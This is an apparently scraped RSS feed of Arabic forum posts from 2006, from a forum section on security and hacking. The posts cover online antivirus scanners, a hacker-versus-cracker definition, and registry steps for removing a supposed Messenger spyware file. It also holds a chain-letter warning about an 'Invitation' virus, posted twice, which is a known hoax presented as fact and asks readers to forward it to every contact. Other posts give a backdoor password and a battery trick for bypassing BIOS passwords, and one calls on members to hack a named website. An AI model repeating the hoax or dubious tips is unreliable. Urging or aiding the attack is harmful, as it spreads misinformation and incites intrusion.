
والله الموفق [/FRAME]
]]></description>
			<content:encoded><![CDATA[<div><div align="center"><font color="RoyalBlue">[FRAME=&quot;8 70&quot;]السلام عليكم ورحمه الله وبركاته<br />
<br />
<br />
الملفات ممكن تجينا من البريد او ممكن عن طريق شخص عبر الماسنجر او عن طريق موقع<br />
ممكن تفحصه بجهازك ببرنامج مضاد للفيروسات <br />
<br />
لكن ممكن ما يكون عندك البرامج او ما سويت له تحديث او انك تشك بقدراته او انه لا يعمل لاي سبب كان<br />
او من الممكن ان يكون الملف مشفر او مضغوط .. ثم تنطري عليه الحيله التي عملها الهكر ولا يصيده البرنامج او او<br />
<br />
ولان بعض الفايروسات يصيدها برنامج بينما برنامج اخرى لا يستطيع اكتشافها وممكن يكون العكس<br />
لان كل برنامج وله طريقه في اكتشاف الفيروسات<br />
<br />
راح اضع موقعين وانصح بوضعهم في المفضلة لديكم لتستخدمها عند الحاجة <br />
طبعا بتعرفون ليه انصح بها !!<br />
<br />
<br />
فكرة الموقعين : هي ان تقدر تعمل سكان وتحليل على ملف معين انت شاك فيه<br />
وذلك عن طريق اكثر من 20 برنامج مضاد للفيروسات مثل الكاسبر و النورتن والنود والباندا و و<br />
ويتم تحديث هذه البرامج كل ساعه <br />
<br />
<br />
الاول :<br />
<br />
<a href="http://www.virustotal.com/en/indexf.html" target="_blank">http://www.virustotal.com/en/indexf.html</a><br />
<br />
<br />
هذا الموقع يستخدم البرامج التالية :<br />
<br />
AntiVir <br />
Authentium <br />
Avast <br />
AVG <br />
BitDefender <br />
CAT-QuickHeal <br />
ClamAV <br />
DrWeb <br />
eTrust-InoculateIT <br />
eTrust-Vet <br />
Ewido <br />
Fortinet <br />
F-Prot <br />
F-Prot4 <br />
Ikarus <br />
Kaspersky <br />
McAfee <br />
Microsoft <br />
NOD32v2 <br />
Norman <br />
Panda <br />
Sophos <br />
Symantec <br />
TheHacker <br />
UNA <br />
VBA32 <br />
VirusBuster <br />
<br />
--------------------------------------------<br />
<br />
الثاني:<br />
<br />
<br />
<br />
<a href="http://virusscan.jotti.org/" target="_blank">http://virusscan.jotti.org/</a><br />
<br />
<br />
ويستخدم :<br />
AntiVir <br />
ArcaVir <br />
Avast <br />
AVG Antivirus <br />
BitDefender <br />
ClamAV <br />
Dr.Web <br />
F-Prot Antivirus <br />
Fortinet <br />
Kaspersky Anti-Virus <br />
NOD32 <br />
Norman Virus Control <br />
UNA <br />
VirusBuster <br />
VBA32 <br />
<br />
<br />
ملاحظة: استخدموا الاثنين للاحتياط ,, فقد يكون موقع لديه اصدار احد البرامج اقدم من اصدار الموقع الاخر فيكون هناك اختلاف في النتائج<br />
<br />
 <br />
<br />
والله الموفق [/FRAME]</font></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>Nathyaa</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=26601</guid>
		</item>
		<item>
			<title>تعريف الهاكر</title>
			<link>https://kwety.net/vb/showthread.php?t=26581&amp;goto=newpost</link>
			<pubDate>Sun, 30 Jul 2006 17:58:24 GMT</pubDate>
			<description>


أطلقت هذة الكلمة اول ما أطلقت في الستينيات لتشير الي المبرمجين المهرة القادرين على التعامل مع الكمبيوتر ومشاكله بخبرة ودراية حيث أنهم وكانوا يقدمون حلولا لمشاكل البرمجة بشكل تطوعي في الغالب . 
بالطبع لم تكن الويندوز او مايعرف بالـ Graphical User Interface او GUI قد ظهرت في ذلك الوقت ولكن البرمجة بلغة البيسيك واللوغو والفورتوران في ذلك الزمن كانت جديرة بالأهتمام . ومن هذا المبداء غدى العارفين بتلك اللغات والمقدمين العون للشركات والمؤسسات والبنوك يعرفون بالهاكرز وتعني الملمين بالبرمجة ومقدمي خدماتهم للأخرين في زمن كان عددهم لايتجاوز بضع الوف على مستوى العالم أجمع. لذلك فإن هذا الوصف له مدلولات إيجابية ولايجب خلطه خطأ مع الفئة الأخرى الذين يسطون عنوه على البرامج ويكسرون رموزها بسبب إمتلاكهم لمهارات فئة الهاكرز الشرفاء. ونظرا لما سببته الفئة الأخيرة من مشاكل وخسائر لا حصر لها فقد أطلق عليهم إسما مرادفا للهاكرز ولكنه يتداول خطأ اليوم وهو (الكراكرز) Crackers. كان الهاكرز في تلك الحقبة من الزمن يعتبرون عباقرة في البرمجة فالهاكر هو المبرمج الذي يقوم بتصميم أسرع البرامج والخالي في ذات الوقت من المشاكل والعيوب التي تعيق البرنامج عن القيام بدورة المطلوب منه. ولأنهم كذلك فقد ظهر منهم إسمان نجحا في تصميم وإرساء قواعد أحد البرامج المستخدمة اليوم وهما دينيس ريتشي وكين تومسون اللذان نجحا في اواخر الستينيات في إخراج برنامج اليونيكس الشهير الي حيز الوجود. لذلك فمن الأفضل عدم إطلاق لقب الهاكر على الأفراد الذين يدخلون عنوة الي الأنظمة بقصد التطفل او التخريب بل علينا إطلاق لقب الكراكرز عليهم وهي كلمة مأخوذة من الفعل Crack بالأنجليزية وتعني الكسر او التحطيم وهي الصفة التي يتميزون بها . 
أنواع الكراكرز 
قد لايستصيغ البعض كلمة كراكرز التي ادعو بها المخربين هنا لأنه تعود على كلمة هاكرز ولكني سأستخدمها لأعني به المخربين لأنظمة الكمبيوتر وهم على كل حال ينقسمون الي قسمين : 
1- المحترفون: هم إما أن يكونوا ممن يحملون درجات جامعية عليا تخصص كمبيوتر ومعلوماتية ويعملون محللي نظم ومبرمجين ويكونوا على دراية ببرامج التشغيل ومعرفة عميقة بخباياها والثغرات الموجودة بها. تنتشر هذة الفئة غالبا بأمريكا وأوروبا ولكن إنتشارهم بداء يظهر بالمنطقة العربية (لايعني هذا أن كل من يحمل شهادة عليا بالبرمجة هو باي حال من الأحوال كراكر) ولكنه متى ما إقتحم الأنظمة عنوة مستخدما اسلحته البرمجية العلمية في ذلك فهو بطبيعة الحال احد المحترفين. 
2- الهواه: إما أن يكون احدهم حاملا لدرجة علمية تساندة في الأطلاع على كتب بلغات أخرى غير لغته كالأدب الإنجليزي او لديه هواية قوية في تعلم البرمجة ونظم التشغيل فيظل مستخدما للبرامج والتطبيقات الجاهزة ولكنه يطورها حسبما تقتضيه حاجته ولربما يتمكن من كسر شيفرتها البرمجية ليتم نسخها وتوزيعها بالمجان. هذا الصنف ظهر كثيرا في العامين الأخرين على مستوى المعمورة وساهم في إنتشارة عاملين . الأول: إنتشار البرامج المساعدة وكثرتها وسهولة التعامل معها . والأمر الثاني: إرتفاع اسعار برامج وتطبيقات الكمبيوتر الأصلية التي تنتجها الشركات مما حفز الهواة على إيجاد سبل أخرى لشراء البرامج الأصلية بأسعار تقل كثيرا عما وضع ثمنا لها من قبل الشركات المنتجه. 
ينقسم الهواة كذلك الي قسمين : 
1- الخبير: وهو شخص يدخل للأجهزة دون الحاق الضرر بها ولكنه يميل الي السيطرة على الجهاز فتجده يحرك الماوس عن بعد او يفتح مشغل الأقراص بقصد السيطرة لا أكثر . 
2- المبتدي: هذا النوع أخطر الكراكرز جميعهم لأنه يحب أن يجرب برامج الهجوم دون أن يفقه تطبيقها فيستخدمها بعشوائية لذلك فهو يقوم أحيانا بدمار واسع دون أن يدري بما يفعله.
</description>
			<content:encoded><![CDATA[<div><div align="center"><br />
<br />
<br />
أطلقت هذة الكلمة اول ما أطلقت في الستينيات لتشير الي المبرمجين المهرة القادرين على التعامل مع الكمبيوتر ومشاكله بخبرة ودراية حيث أنهم وكانوا يقدمون حلولا لمشاكل البرمجة بشكل تطوعي في الغالب . <br />
بالطبع لم تكن الويندوز او مايعرف بالـ Graphical User Interface او GUI قد ظهرت في ذلك الوقت ولكن البرمجة بلغة البيسيك واللوغو والفورتوران في ذلك الزمن كانت جديرة بالأهتمام . ومن هذا المبداء غدى العارفين بتلك اللغات والمقدمين العون للشركات والمؤسسات والبنوك يعرفون بالهاكرز وتعني الملمين بالبرمجة ومقدمي خدماتهم للأخرين في زمن كان عددهم لايتجاوز بضع الوف على مستوى العالم أجمع. لذلك فإن هذا الوصف له مدلولات إيجابية ولايجب خلطه خطأ مع الفئة الأخرى الذين يسطون عنوه على البرامج ويكسرون رموزها بسبب إمتلاكهم لمهارات فئة الهاكرز الشرفاء. ونظرا لما سببته الفئة الأخيرة من مشاكل وخسائر لا حصر لها فقد أطلق عليهم إسما مرادفا للهاكرز ولكنه يتداول خطأ اليوم وهو (الكراكرز) Crackers. كان الهاكرز في تلك الحقبة من الزمن يعتبرون عباقرة في البرمجة فالهاكر هو المبرمج الذي يقوم بتصميم أسرع البرامج والخالي في ذات الوقت من المشاكل والعيوب التي تعيق البرنامج عن القيام بدورة المطلوب منه. ولأنهم كذلك فقد ظهر منهم إسمان نجحا في تصميم وإرساء قواعد أحد البرامج المستخدمة اليوم وهما دينيس ريتشي وكين تومسون اللذان نجحا في اواخر الستينيات في إخراج برنامج اليونيكس الشهير الي حيز الوجود. لذلك فمن الأفضل عدم إطلاق لقب الهاكر على الأفراد الذين يدخلون عنوة الي الأنظمة بقصد التطفل او التخريب بل علينا إطلاق لقب الكراكرز عليهم وهي كلمة مأخوذة من الفعل Crack بالأنجليزية وتعني الكسر او التحطيم وهي الصفة التي يتميزون بها . <br />
أنواع الكراكرز <br />
قد لايستصيغ البعض كلمة كراكرز التي ادعو بها المخربين هنا لأنه تعود على كلمة هاكرز ولكني سأستخدمها لأعني به المخربين لأنظمة الكمبيوتر وهم على كل حال ينقسمون الي قسمين : <br />
1- المحترفون: هم إما أن يكونوا ممن يحملون درجات جامعية عليا تخصص كمبيوتر ومعلوماتية ويعملون محللي نظم ومبرمجين ويكونوا على دراية ببرامج التشغيل ومعرفة عميقة بخباياها والثغرات الموجودة بها. تنتشر هذة الفئة غالبا بأمريكا وأوروبا ولكن إنتشارهم بداء يظهر بالمنطقة العربية (لايعني هذا أن كل من يحمل شهادة عليا بالبرمجة هو باي حال من الأحوال كراكر) ولكنه متى ما إقتحم الأنظمة عنوة مستخدما اسلحته البرمجية العلمية في ذلك فهو بطبيعة الحال احد المحترفين. <br />
2- الهواه: إما أن يكون احدهم حاملا لدرجة علمية تساندة في الأطلاع على كتب بلغات أخرى غير لغته كالأدب الإنجليزي او لديه هواية قوية في تعلم البرمجة ونظم التشغيل فيظل مستخدما للبرامج والتطبيقات الجاهزة ولكنه يطورها حسبما تقتضيه حاجته ولربما يتمكن من كسر شيفرتها البرمجية ليتم نسخها وتوزيعها بالمجان. هذا الصنف ظهر كثيرا في العامين الأخرين على مستوى المعمورة وساهم في إنتشارة عاملين . الأول: إنتشار البرامج المساعدة وكثرتها وسهولة التعامل معها . والأمر الثاني: إرتفاع اسعار برامج وتطبيقات الكمبيوتر الأصلية التي تنتجها الشركات مما حفز الهواة على إيجاد سبل أخرى لشراء البرامج الأصلية بأسعار تقل كثيرا عما وضع ثمنا لها من قبل الشركات المنتجه. <br />
ينقسم الهواة كذلك الي قسمين : <br />
1- الخبير: وهو شخص يدخل للأجهزة دون الحاق الضرر بها ولكنه يميل الي السيطرة على الجهاز فتجده يحرك الماوس عن بعد او يفتح مشغل الأقراص بقصد السيطرة لا أكثر . <br />
2- المبتدي: هذا النوع أخطر الكراكرز جميعهم لأنه يحب أن يجرب برامج الهجوم دون أن يفقه تطبيقها فيستخدمها بعشوائية لذلك فهو يقوم أحيانا بدمار واسع دون أن يدري بما يفعله.</div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>neo102010</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=26581</guid>
		</item>
		<item>
			<title>اخطر الفيروسات الجديده ارجو الحذر ....؟؟؟...</title>
			<link>https://kwety.net/vb/showthread.php?t=26327&amp;goto=newpost</link>
			<pubDate>Thu, 27 Jul 2006 07:57:22 GMT</pubDate>
			<description><![CDATA[[FRAME="1 70"]أخطر فيروس أعلنت عنه (سي إن إن) 
صنفته (مايكروسوفت) بأنه الفيروس الأشد ضرراً على الإطلاق ..
والذي (يحرق) القرص الصلب ( C ) في أجهزة الكمبيوتر !


لا تقم أبدا بفتح أي رسالة بريد إلكتروني تحتوي على ملف مرفق عنوانه Invitation
بغض النظر عمن أرسل لك الرسالة . 
إنه بكل بساطة فيروس يقوم (بحرق) كامل القرص الصلب ( C ) في جهازك. 
الرسالة سوف تصلك من شخص لديه عنوانك الالكتروني وقد يكون معروفا لديك ! 
وهذا مايحتم عليك إرسال هذا التحذير إلى كافة قائمة جهات الإتصال لديك !. 
من الأفضل أن تصلك هذه الرسالة 25 مرة من أن تصلك الرسالة المحتوية على الفيروس وتقوم بفتحها ! 

في حالة استلامك أي ميل تحت عنوان Invitation 
والذي تعتقد أنه ارسل لك من أحد اصدقائك.. لا تقم أبدا بفتح الرسالة ! 
بل أغلق جهازك على الفور ! 
شركة (مكافي) هي من اكتشف هذا الفيروس يوم أمس . .
ولا يوجد حتى الآن طريقة لإصلاح هذا النوع من الفيروسات ! 
بكل بساطة يقوم الفيروس بتدمير (القطاع صفر) في القرص الصلب . .
حيث تحفظ كل المعلومات الأساسية. 

____________________________________

This is the worst virus announced by CNN it has been classified by Microsoft as the most destructive virus ever "burns" 
the whole hard disc C of your computer 
You should be alert during the next days: 
Do not open any message with an attached file called : " Invitation" 
regardless of who sent it . It is a virus that opens an Olympic Torch which "burns" the whole hard disc C of your computer. 
This virus will be received from someone who has your e-mail address in his/her contact ! list, that is why you should send this e-mail to all your contacts. It is better to receive this message 25 times than to receive the virus and open it. If you receive a mail called "invitation", though sent by a friend, do not open it and shut down your computer immediately. 
This is the worst virus announced by CNN, it has been classified by Microsoft as the most destructive virus ever. This virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept. [/FRAME]
]]></description>
			<content:encoded><![CDATA[<div><div align="center">[FRAME=&quot;1 70&quot;]أخطر فيروس أعلنت عنه (سي إن إن) <br />
صنفته (مايكروسوفت) بأنه الفيروس الأشد ضرراً على الإطلاق ..<br />
والذي (يحرق) القرص الصلب ( C ) في أجهزة الكمبيوتر !<br />
<br />
<br />
لا تقم أبدا بفتح أي رسالة بريد إلكتروني تحتوي على ملف مرفق عنوانه Invitation<br />
بغض النظر عمن أرسل لك الرسالة . <br />
إنه بكل بساطة فيروس يقوم (بحرق) كامل القرص الصلب ( C ) في جهازك. <br />
الرسالة سوف تصلك من شخص لديه عنوانك الالكتروني وقد يكون معروفا لديك ! <br />
وهذا مايحتم عليك إرسال هذا التحذير إلى كافة قائمة جهات الإتصال لديك !. <br />
من الأفضل أن تصلك هذه الرسالة 25 مرة من أن تصلك الرسالة المحتوية على الفيروس وتقوم بفتحها ! <br />
<br />
في حالة استلامك أي ميل تحت عنوان <font color="red">Invitation </font><br />
والذي تعتقد أنه ارسل لك من أحد اصدقائك.. لا تقم أبدا بفتح الرسالة ! <br />
بل أغلق جهازك على الفور ! <br />
شركة (مكافي) هي من اكتشف هذا الفيروس يوم أمس . .<br />
ولا يوجد حتى الآن طريقة لإصلاح هذا النوع من الفيروسات ! <br />
بكل بساطة يقوم الفيروس بتدمير (القطاع صفر) في القرص الصلب . .<br />
حيث تحفظ كل المعلومات الأساسية. <br />
<br />
____________________________________<br />
<br />
This is the worst virus announced by CNN it has been classified by Microsoft as the most destructive virus ever &quot;burns&quot; <br />
the whole hard disc C of your computer <br />
You should be alert during the next days: <br />
Do not open any message with an attached file called : &quot; <font color="Red">Invitation</font>&quot; <br />
regardless of who sent it . It is a virus that opens an Olympic Torch which &quot;burns&quot; the whole hard disc C of your computer. <br />
This virus will be received from someone who has your e-mail address in his/her contact ! list, that is why you should send this e-mail to all your contacts. It is better to receive this message 25 times than to receive the virus and open it. If you receive a mail called &quot;invitation&quot;, though sent by a friend, do not open it and shut down your computer immediately. <br />
This is the worst virus announced by CNN, it has been classified by Microsoft as the most destructive virus ever. This virus was discovered by McAfee yesterday, and there is no repair yet for this kind of virus. This virus simply destroys the Zero Sector of the Hard Disc, where the vital information is kept. [/FRAME]</div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>مودي الحساس</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=26327</guid>
		</item>
		<item>
			<title>كيف تحذف ملف تجسس الموجود فى كل ماسنجر ؟</title>
			<link>https://kwety.net/vb/showthread.php?t=25767&amp;goto=newpost</link>
			<pubDate>Wed, 19 Jul 2006 14:43:04 GMT</pubDate>
			<description>كيف تحذف ملف تجسس الموجود فى كل ماسنجر 
أنذار فى كل ماسنجر ملف تجسس 
الماسنجير اصدار الرابع و الخامس والسادس فيهم ملف تجسس من شركة مايكروسوفت 

اسم الملف هو Loadqm.exe 

طرق حذف هذا الملف وهي كالاتي /

الخطوة الاولى 

1) إبدأ 

2) تشغيل

3) اكتب هذه الكلمه msconfig ستظهر لك شاشه تذذهب الى Startup 

ثم تبحث على هذه الكلمه Loadqm.exe اذا وجدتها نلغي الصح عنها واضغط (تطبيق) وبعدين (موافق )بطلب منك هل تريد اعادة تشغيل الكمبيوتر تختار (موافق) 

بعد ما عدنا تشغيل الكمبيوتر 


************************************

الخطوة التانيه 


تذهب مره اخرى على
إبدأ 
تشغيل
وبعد ذلك تكتب Regedit 

تظهر شاشه 

تذهب HKEY_LOCAL_MACHINE 

وبعد ذلك Software 

وبعد ذلك Microsoft 

وبعد ذلك Windows 

وفي كلمة تشغيل تذهب للثانيه ستجد Loadqm.exe إحذفها 


*****************************

الخطوة الثالثه 

تذهب الى Start 

ثم Programs 

ثم MS-DOS Prompt 

ونكتب deltree loadqm.exe 



وهكذا انتهينا من ملف التجسس

واتمنى الشرح مبسط ولزيز ع قلوبكم 
</description>
			<content:encoded><![CDATA[<div><div align="center">كيف تحذف ملف تجسس الموجود فى كل ماسنجر <br />
أنذار فى كل ماسنجر ملف تجسس <br />
الماسنجير اصدار الرابع و الخامس والسادس فيهم ملف تجسس من شركة مايكروسوفت <br />
<br />
اسم الملف هو Loadqm.exe <br />
<br />
طرق حذف هذا الملف وهي كالاتي /<br />
<br />
الخطوة الاولى <br />
<br />
1) إبدأ <br />
<br />
2) تشغيل<br />
<br />
3) اكتب هذه الكلمه msconfig ستظهر لك شاشه تذذهب الى Startup <br />
<br />
ثم تبحث على هذه الكلمه Loadqm.exe اذا وجدتها نلغي الصح عنها واضغط (تطبيق) وبعدين (موافق )بطلب منك هل تريد اعادة تشغيل الكمبيوتر تختار (موافق) <br />
<br />
بعد ما عدنا تشغيل الكمبيوتر <br />
<br />
<br />
************************************<br />
<br />
الخطوة التانيه <br />
<br />
<br />
تذهب مره اخرى على<br />
إبدأ <br />
تشغيل<br />
وبعد ذلك تكتب Regedit <br />
<br />
تظهر شاشه <br />
<br />
تذهب HKEY_LOCAL_MACHINE <br />
<br />
وبعد ذلك Software <br />
<br />
وبعد ذلك Microsoft <br />
<br />
وبعد ذلك Windows <br />
<br />
وفي كلمة تشغيل تذهب للثانيه ستجد Loadqm.exe إحذفها <br />
<br />
<br />
*****************************<br />
<br />
الخطوة الثالثه <br />
<br />
تذهب الى Start <br />
<br />
ثم Programs <br />
<br />
ثم MS-DOS Prompt <br />
<br />
ونكتب deltree loadqm.exe <br />
<br />
<br />
<br />
وهكذا انتهينا من ملف التجسس<br />
<br />
واتمنى الشرح مبسط ولزيز ع قلوبكم </div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25767</guid>
		</item>
		<item>
			<title>لــفــتـــح أي جــهــــاز مــغــلـــق بــرقـــم ســـري ....</title>
			<link>https://kwety.net/vb/showthread.php?t=25765&amp;goto=newpost</link>
			<pubDate>Wed, 19 Jul 2006 14:02:13 GMT</pubDate>
			<description>هنـا تجـد الحـل لفتحـ أي جهـاز مغـلق برقمـ سـري ...! 
:
:
:
:
بعض الأجهزة عند تشغيلها تطلب كلمة سر قبل الدخول إلى شاشة ترحيب الويندوز وهذه الكلمة السرية تحفظ بالماذربورد واليك طريقة فتح لاجهزة المقفلة 
توجد طريقتان لعمل ذلك : 
الأولى : قم بإدخال ما بين القوسين { award-sw } بدلاً من الرقم الأصلي ، 
ونسبة نجاحه 95% في عملية الفتح 
الثانية : القيام بعملية إخراج البطارية الصغيرة التي توجد داخل صندوق الجهاز من مكانـها ثم إعادتـها 
مرة أخرى ، والموجودة في اللوحة الرئيسية لجهاز الكمبيوتر ونسبة 
نجاحها 100% والسبب هو لأن تلك العملية سوف تؤدي إلى الإلغاء النهائي 
لعملية الإقـفال السري ، والبداية من جديد دون أية أضرار قد تحدث لجهازك....
</description>
			<content:encoded><![CDATA[<div><div align="center">هنـا تجـد الحـل لفتحـ أي جهـاز مغـلق برقمـ سـري ...! <br />
:<br />
:<br />
:<br />
:<br />
بعض الأجهزة عند تشغيلها تطلب كلمة سر قبل الدخول إلى شاشة ترحيب الويندوز وهذه الكلمة السرية تحفظ بالماذربورد واليك طريقة فتح لاجهزة المقفلة <br />
توجد طريقتان لعمل ذلك : <br />
الأولى : قم بإدخال ما بين القوسين { award-sw } بدلاً من الرقم الأصلي ، <br />
ونسبة نجاحه 95% في عملية الفتح <br />
الثانية : القيام بعملية إخراج البطارية الصغيرة التي توجد داخل صندوق الجهاز من مكانـها ثم إعادتـها <br />
مرة أخرى ، والموجودة في اللوحة الرئيسية لجهاز الكمبيوتر ونسبة <br />
نجاحها 100% والسبب هو لأن تلك العملية سوف تؤدي إلى الإلغاء النهائي <br />
لعملية الإقـفال السري ، والبداية من جديد دون أية أضرار قد تحدث لجهازك....</div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25765</guid>
		</item>
		<item>
			<title>موقع قذر اتمنى الاختراق</title>
			<link>https://kwety.net/vb/showthread.php?t=25712&amp;goto=newpost</link>
			<pubDate>Tue, 18 Jul 2006 22:31:18 GMT</pubDate>
			<description><![CDATA[سلام الله عليكم 
نائمين ولا زلنا نائمين .. ولا اعرف متى سنتكاتف وننطلق للدفاع عن ديننا وعن رسولنا وعن ربنا .. 
متى سنتكاتف و نبين للكفار ان الأسلام ليس مجرد كلام .. 
نرى التعدي على الرسول صلى الله عليه وسلم من قبل الدنمارك والعذر حرية التعبير .. ونرى المسلمين في 
بلاد المسيح يهانون ويشتمون .. وآخر ما رأيت اليوم .. هذا الموقع " القذر الحقير " واعذروني على هذا
التعبير لكن هذا ما ستقولونه انتم ايضا عندما تتصفحون هذا الموقع .. 
موقع يستهزأ بالقرآن الكريم وبرسولنا الكريم وبالأحاديث النبوية .. 
واين شباب امتنا ؟؟ لا وجود لهم وقت الحاجة .. 
اترككم مع الموقع .. واتمنى ان اجد بينكم المخترق المحترف الذي يستطيع اختراق هذا الموقع وتلقين القائم 
عليه درسا في اصول احترام الأديان مهما كانت ديانته كأحترام الأسلام للأديان الأخرى .. 
موقع قذر اتمنى الاختراق (http://www.rapsaweyat.com/)
في انتظار تحرككم يا شباب امتنا .. 
اخوكم في الله
حبيب الجميع 
]]></description>
			<content:encoded><![CDATA[<div><div align="center"><font size="5">سلام الله عليكم <br />
نائمين ولا زلنا نائمين .. ولا اعرف متى سنتكاتف وننطلق للدفاع عن ديننا وعن رسولنا وعن ربنا .. <br />
متى سنتكاتف و نبين للكفار ان الأسلام ليس مجرد كلام .. <br />
نرى التعدي على الرسول صلى الله عليه وسلم من قبل الدنمارك والعذر حرية التعبير .. ونرى المسلمين في <br />
بلاد المسيح يهانون ويشتمون .. وآخر ما رأيت اليوم .. هذا الموقع &quot; القذر الحقير &quot; واعذروني على هذا<br />
التعبير لكن هذا ما ستقولونه انتم ايضا عندما تتصفحون هذا الموقع .. <br />
موقع يستهزأ بالقرآن الكريم وبرسولنا الكريم وبالأحاديث النبوية .. <br />
واين شباب امتنا ؟؟ لا وجود لهم وقت الحاجة .. <br />
اترككم مع الموقع .. واتمنى ان اجد بينكم المخترق المحترف الذي يستطيع اختراق هذا الموقع وتلقين القائم <br />
عليه درسا في اصول احترام الأديان مهما كانت ديانته كأحترام الأسلام للأديان الأخرى .. <br />
<a href="http://www.rapsaweyat.com/" target="_blank">موقع قذر اتمنى الاختراق</a><br />
في انتظار تحرككم يا شباب امتنا .. <br />
اخوكم في الله<br />
حبيب الجميع </font></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25712</guid>
		</item>
		<item>
			<title>نصيحة لتسريع جهازك بدون برنامج</title>
			<link>https://kwety.net/vb/showthread.php?t=25709&amp;goto=newpost</link>
			<pubDate>Tue, 18 Jul 2006 22:06:57 GMT</pubDate>
			<description>السلام عليكم ورحمة الله وبركاته 
اذا كنت من مستخدمي xp فهذا الويندوز يسجل كل نقرة ماوس او اي صفحة تقوم بفتحها وتخزنها مما يجعل عمل جهازك بطييء لمسح هذه المعلومات التي ليس لها فائدة قم بالتالي :- 
افتح ابدأ ( start ) ثم اضغط على تشغيل واكتب كلمة prefetch وسوف يفتح لك صفحة فيها الكثير من الملفات حددها جميعها ثم قم بحذفها 0 
بعد ذلك سوف تجد سرعة جهازك تتحسن باذن الله
</description>
			<content:encoded><![CDATA[<div><div align="center"><font size="5">السلام عليكم ورحمة الله وبركاته <br />
اذا كنت من مستخدمي xp فهذا الويندوز يسجل كل نقرة ماوس او اي صفحة تقوم بفتحها وتخزنها مما يجعل عمل جهازك بطييء لمسح هذه المعلومات التي ليس لها فائدة قم بالتالي :- <br />
افتح ابدأ ( start ) ثم اضغط على تشغيل واكتب كلمة prefetch وسوف يفتح لك صفحة فيها الكثير من الملفات حددها جميعها ثم قم بحذفها 0 <br />
بعد ذلك سوف تجد سرعة جهازك تتحسن باذن الله</font></div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25709</guid>
		</item>
		<item>
			<title>أخطر فيروس أعلنت عنه (سي إن إن)</title>
			<link>https://kwety.net/vb/showthread.php?t=25699&amp;goto=newpost</link>
			<pubDate>Tue, 18 Jul 2006 19:55:27 GMT</pubDate>
			<description><![CDATA[[GRADE="8B0000 FF0000 FF7F50"]أخطر فيروس أعلنت عنه (سي إن إن) 
صنفته (مايكروسوفت) بأنه الفيروس الأشد ضرراً على الإطلاق ..
والذي (يحرق) القرص الصلب (C) في أجهزة الكمبيوتر !


لا تقم أبدا بفتح أي رسالة بريد إلكتروني تحتوي على ملف مرفق عنوانه 
Invitation 
بغض النظر عمن أرسل لك الرسالة .. 
إنه بكل بساطة فيروس يقوم (بحرق) كامل القرص الصلب (C) في جهازك. 
الرسالة سوف تصلك من شخص لديه عنوانك الالكتروني وقد يكون معروفا لديك !
وهذا مايحتم عليك إرسال هذا التحذير إلى كافة قائمة جهات الإتصال لديك !. 
من الأفضل أن تصلك هذه الرسالة 25 مرة من أن تصلك الرسالة المحتوية على الفيروس وتقوم بفتحها !

في حالة استلامك أي ميل تحت عنوان Invitation 
والذي تعتقد أنه ارسل لك من أحد اصدقائك.. لا تقم أبدا بفتح الرسالة !
بل أغلق جهازك على الفور !
شركة (مكافي) هي من اكتشف هذا الفيروس يوم أمس ..
ولا يوجد حتى الآن طريقة لإصلاح هذا النوع من الفيروسات !
بكل بساطة يقوم الفيروس بتدمير (القطاع صفر) في القرص الصلب ..
حيث تحفظ كل المعلومات الأساسية[/GRADE]
]]></description>
			<content:encoded><![CDATA[<div><div align="center">[GRADE=&quot;8B0000 FF0000 FF7F50&quot;]أخطر فيروس أعلنت عنه (سي إن إن) <br />
صنفته (مايكروسوفت) بأنه الفيروس الأشد ضرراً على الإطلاق ..<br />
والذي (يحرق) القرص الصلب (C) في أجهزة الكمبيوتر !<br />
<br />
<br />
لا تقم أبدا بفتح أي رسالة بريد إلكتروني تحتوي على ملف مرفق عنوانه <br />
Invitation <br />
بغض النظر عمن أرسل لك الرسالة .. <br />
إنه بكل بساطة فيروس يقوم (بحرق) كامل القرص الصلب (C) في جهازك. <br />
الرسالة سوف تصلك من شخص لديه عنوانك الالكتروني وقد يكون معروفا لديك !<br />
وهذا مايحتم عليك إرسال هذا التحذير إلى كافة قائمة جهات الإتصال لديك !. <br />
من الأفضل أن تصلك هذه الرسالة 25 مرة من أن تصلك الرسالة المحتوية على الفيروس وتقوم بفتحها !<br />
<br />
في حالة استلامك أي ميل تحت عنوان Invitation <br />
والذي تعتقد أنه ارسل لك من أحد اصدقائك.. لا تقم أبدا بفتح الرسالة !<br />
بل أغلق جهازك على الفور !<br />
شركة (مكافي) هي من اكتشف هذا الفيروس يوم أمس ..<br />
ولا يوجد حتى الآن طريقة لإصلاح هذا النوع من الفيروسات !<br />
بكل بساطة يقوم الفيروس بتدمير (القطاع صفر) في القرص الصلب ..<br />
حيث تحفظ كل المعلومات الأساسية[/GRADE]</div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>حبيب الجميع</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=25699</guid>
		</item>
		<item>
			<title>نصيحه لاصحاب و ندوز Xp ..مـهـم</title>
